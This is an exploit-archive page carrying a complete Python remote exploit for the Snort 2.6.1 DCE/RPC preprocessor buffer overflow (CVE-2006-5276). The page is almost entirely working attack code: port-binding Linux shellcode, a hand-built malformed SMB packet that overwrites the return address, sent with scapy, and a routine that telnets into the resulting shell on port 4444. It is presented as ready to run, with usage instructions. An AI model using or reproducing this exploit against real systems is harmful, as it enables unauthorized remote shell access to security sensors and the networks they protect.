exploits , vulnerabilities , articles , Snort 2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow Exploit (linux)

Rated as : High Risk

#!/usr/bin/python
#
# Remote exploit for Snort DCE/RPC preprocessor vulnerability as described
in
# CVE-2006-5276. The exploit binds a shell to TCP port 4444 and connects
to it.
# This code was tested against snort-2.6.1 running on Red Hat Linux 8
#
# Author shall bear no responsibility for any screw ups caused by using
this code
# Winny Thomas :-)

import os
import sys
import time
from scapy import *

# Linux portbind shellcode; Binds shell on TCP port 4444
shellcode  =
"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96"
shellcode +=
"\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56"
shellcode +=
"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1"
shellcode +=
"\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0"
shellcode +=
"\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
shellcode += "\x89\xe1\xcd\x80"

def ExploitSnort(target):
       # SMB packet borrowed from http://www.milw0rm.com/exploits/3391
       # NetBIOS Session Service
       smbreq = "\x00\x00\x02\xab"

       # SMB Header
       smbreq +=
"\xff\x53\x4d\x42\x75\x00\x00\x00\x00\x18\x07\xc8\x00\x00"
       smbreq +=
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe"
       smbreq += "\x00\x08\x30\x00"

       # Tree Connect AndX Request
       smbreq +=
"\x04\xa2\x00\x52\x00\x08\x00\x01\x00\x27\x00\x00"
       smbreq +=
"\x5c\x00\x5c\x00\x49\x00\x4e\x00\x53\x00\x2d\x00\x4b\x00\x49\x00"
       smbreq +=
"\x52\x00\x41\x00\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00"
       smbreq += "\x3f\x3f\x3f\x3f\x3f\x00"

       # NT Create AndX Request
       smbreq +=
"\x18\x2f\x00\x96\x00\x00\x0e\x00\x16\x00\x00\x00\x00\x00\x00\x00"
       smbreq +=
"\x9f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
       smbreq +=
"\x03\x00\x00\x00\x01\x00\x00\x00\x40\x00\x40\x00\x02\x00\x00\x00"
       smbreq +=
"\x01\x11\x00\x00\x5c\x00\x73\x00\x72\x00\x76\x00\x73\x00\x76\x00"
       smbreq += "\x63\x00\x00\x00"

       # Write AndX Request #1
       smbreq +=
"\x0e\x2f\x00\xfe\x00\x00\x40\x00\x00\x00\x00\xff\xff\xff\xff\x80"
       smbreq +=
"\x00\x48\x00\x00\x00\x48\x00\xb6\x00\x00\x00\x00\x00\x49\x00\xee"
       smbreq +=
"\x05\x00\x0b\x03\x10\x00\x00\x00\x10\x02\x00\x00\x01\x00\x00\x00"
       smbreq +=
"\xb8\x10\xb8\x10\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00"
       smbreq +=
"\xc8\x4f\x32\x4b\x70\x16\xd3\x01\x12\x78\x5a\x47\xbf\x6e\xe1\x88"
       smbreq +=
"\x03\x00\x00\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00"
       smbreq += "\x2b\x10\x48\x60\x02\x00\x00\x00"

       # Write AndX Request #2
       smbreq +=
"\x0e\xff\x00\xde\xde\x00\x40\x00\x00\x00\x00\xff\xff\xff\xff\x80"
       smbreq +=
"\x00\x48\x00\x00\x00\xff\x01\xce\x01\x00\x00\x00\x00\x49\x00\xee"
       smbreq +=
"\xed\x1e\x94\x7c\x90\x81\xc4\xff\xef\xff\xff\x44"
       smbreq +=
"\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa9"
       # The following address overwrites RET and points into our
shellcode
       smbreq += struct.pack('<L', 0xbfffeff0)
       smbreq += '\x90' * 50
       smbreq += shellcode
       smbreq += '\x90' * 130

       packet = IP(dst=target) / TCP(sport=1025, dport=139,
flags="PA") / smbreq
       send(packet)

def ConnectRemoteShell(target):
       connect = '/usr/bin/telnet ' + target + ' 4444'
       os.system(connect)

if __name__ == '__main__':
       try:
               target = sys.argv[1]
       except IndexError:
               print 'Usage: %s <ip of a host on snort network>' %
sys.argv[0]
               sys.exit(-1)

       print '[+] Sending malformed SMB packet'
       ExploitSnort(target)
       print '[+] Connecting to remote shell in 3 seconds...'
       time.sleep(3)
       ConnectRemoteShell(target)
securitydot.net - 2007-03-30